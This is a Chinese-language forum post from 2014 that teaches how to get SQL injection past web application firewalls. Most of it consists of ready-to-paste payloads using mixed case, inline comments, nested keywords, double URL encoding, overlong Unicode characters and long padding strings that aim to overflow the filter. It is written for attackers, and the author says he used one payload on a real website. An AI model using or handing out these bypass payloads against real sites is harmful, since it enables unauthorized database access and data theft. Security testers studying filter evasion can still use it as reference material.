设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1512|回复: 0

见招拆招:绕过WAF继续SQL注入常用方法

[复制链接]
发表于 2014-6-18 07:30 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
见招拆招:绕过WAF继续SQL注入常用方法

Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过。WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是啥。

    WAF呢,简单说,它是一个Web应用程序防火墙,其功能呢是用于过滤某些恶意请求与某些关键字。WAF仅仅是一个工具,帮助你防护网站来的。但是如果你代码写得特别渣渣,别说WAF帮不了你,就连wefgod都帮不了你…所以不能天真的以为用上WAF你的网站就百毒不侵了。开始正题—-

1>注释符

    相信很多朋友都知道SQL的注释符吧,这算是绕WAF用的最广泛的了。它们允许我们绕过很多Web应用程序防火墙和限制,我们可以注释掉一些sql语句,然后让其只执行攻击语句而达到入侵目的。

    常用注释符:

//, -- , /**/, #, --+, -- -, ;%00

2>情况改变

    然而,以前审计的一些开源程序中,有些厂商的过滤很不严谨,一些是采用黑名单方式过滤,但是有些只过滤了小写形式,然而在传参的时候并没有将接收参数转换为小写进行匹配。针对这种情况,我们很简单就能绕过。

    比如它的过滤语句是:

/union\sselect/g

    那么我们就可以这样构造:

id=1+UnIoN/**/SeLeCT

3>内联注释

    有些WAF的过滤关键词像/union\sselect/g,就比如上面说的,很多时候我都是采用内联注释。更复杂的例子需要更先进的方法。比如添加了SQL关键字,我们就要进一步分离这两个词来绕过这个过滤器。

id=1/*!UnIoN*/SeLeCT

    采用/*! code */来执行我们的SQL语句。内联注释可以用于整个SQL语句中。所以如果table_name或者者information_schema进行了过滤,我们可以添加更多的内联注释内容。

比如一个过滤器过滤了:

union,where, table_name, table_schema, =, and information_schema

    这些都是我们内联注释需要绕过的目标。所以通常利用内联注释进行如下方式绕过:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

    通常情况下,上面的代码可以绕过过滤器,请注意,我们用的是 Like而不是 =

    当一切似乎失败了之后,你可以尝试通过应用防火墙关闭SQL语句中使用的变量:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -

    即使常见内联注释本身没有工作,上述的代码也应该可以绕过union+select过滤器。

4>缓冲区溢出:

    意想不到的输入:

    我们知道,很多的WAFS都是C语言的,他们在装载一堆数据的时候,很容易就会溢出。下面描述的就是一个这样的WAF,当它接收到大量数据恶意的请求和响应时。

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+

    上面的bypass语句,我在最近的一个网站绕过上用到了。

5>替换关键字(preg_replace and/or都能达到相同目的):

    有时程序会删除所有的关键字,例如,有一个过滤器,他会把union select变成空白,这时我们可以采用以下方式进行绕过:

id=1+UNIunionON+SeLselectECT+1,2,3–

    不难明白吧?union和select变成空白了,两边的又会重新组合成新的查询。

UNION+SELECT+1,2,3--

6>Character编码:

    有些情况下,WAF对应用程序中的输入进行解码,但是有些WAF是只过滤解码一次的,所以只要我们对bypass语句进行双重编码就能将其绕过之。(WAF解码一次然后过滤,之后的SQL语句就会被自动解码直接执行了~)

    双重编码bypass语句示例:

id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

        一些双重编码举例:

单引号:'%u0027%u02b9%u02bc%u02c8%u2032%uff07%c0%27%c0%a7%e0%80%a7空白:%u0020%uff00%c0%20%c0%a0%e0%80%a0左括号(:%u0028%uff08%c0%28%c0%a8%e0%80%a8右括号):%u0029%uff09%c0%29%c0%a9%e0%80%a9

7>综合:

绕过几个简单的WAF之后,后面的任务也越来越容易了~下面说几种方法来绕过你的目标WAF。

    7a>拆散SQL语句:

    通常的做法是:需要把SQL注入语句给拆散,来检查是哪个关键字被过滤了。比如,如果你输入的是union+select语句,给你报了一个403或内部服务器错误,什么union不合法什么的,就知道过滤了哪些了,也是常见的Fuzzing测试。这是制造bypass语句的前提。

    7b>冗长的报错:

    当你的sql语法输入错误时、对方网站又没关闭错误回显的时候,会爆出一大堆错误,在php中更会爆出敏感的网站根目录地址。aspx则会爆出整个语法错误详细信息。

    比如你输入的语法是:

id=1+Select+1,2,3--

    会给你报出以下错误:

Error at line 1 near " "+1,2,3--

    上面也说过了黑名单方式过滤,也可以采用以下方式进行绕过:

sel%0bect+1,2,3

     这只是众多方法之一,绕过不同WAF需要不同的bypass思路。

8>高级bypass技巧:

    正如前面所说的,当你尝试着绕过几个WAF之后,你会觉得其实他并不难,会感觉到很有趣,很有挑战性 :b  ,当你在注入的时候发现自己被WAF之后,不要想要放弃,尝试挑战一下,看看它过滤了什么,什么语法允许,什么语法不允许。当然,你也可以尝试暴力一些,就把它当成inflatable doll, [;:{}()*&$/|<>?"'] 中括号里的这些特殊字符不是留着摆设的撒~能报个错出来都是颇为自豪的,骚年,你说对不对?

    但是,如果你试了N个语句,都tm被过滤了,整个人都快崩溃了,该怎么办?很简单,打开音乐播放器,放一首小苹果放松一下。然后把WAF过滤的东东全部copy下来,仔细分析!俗话怎么说来着,世上无难事,只怕有心人。

    举例来说,比如你分析到最后,发现所有的*都被换成空白了,就意味着你不能使用内联注释了,union+select也会给你返回一个403错误,在这种情况下,你应该充分利用*被替换成空白:

id=1+uni*on+sel*ect+1,2,3--+

    这样的话,*被过滤掉了,但是union+select被保留下来了。这是常见的WAF bypass技巧,当然不仅仅是union+select,其他的语法被过滤了都可以采用这种的。找到被替换的那个关键字,你就能找到绕过的方法

    一些常见的bypass:

id=1+(UnIoN)+(SelECT)+id=1+(UnIoN+SeLeCT)+id=1+(UnI)(oN)+(SeL)(EcT)id=1+'UnI''On'+'SeL''ECT' <-MySQL onlyid=1+'UnI'||'on'+SeLeCT' <-MSSQL only

注意:在mysql4.0种,UNI /**/ON+SEL/**/ ECT是没办法用的。

结语:WAF的姿势取决于你思维的扩散,自我感觉在WAF bypass的过程中能找到很多乐

推荐几本SQL注入与Web安全方面的书:

《SQL注入攻击与防御》

《黑客攻防宝典-Web实战篇》

《PHP Security》 这一本适合PHP开发人员阅读

《Web Security》


[发帖际遇]: 一个袋子砸在了 じ、夙愿ら 头上,じ、夙愿ら 赚了 4 SB. 幸运榜 / 衰神榜
随遇而安
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表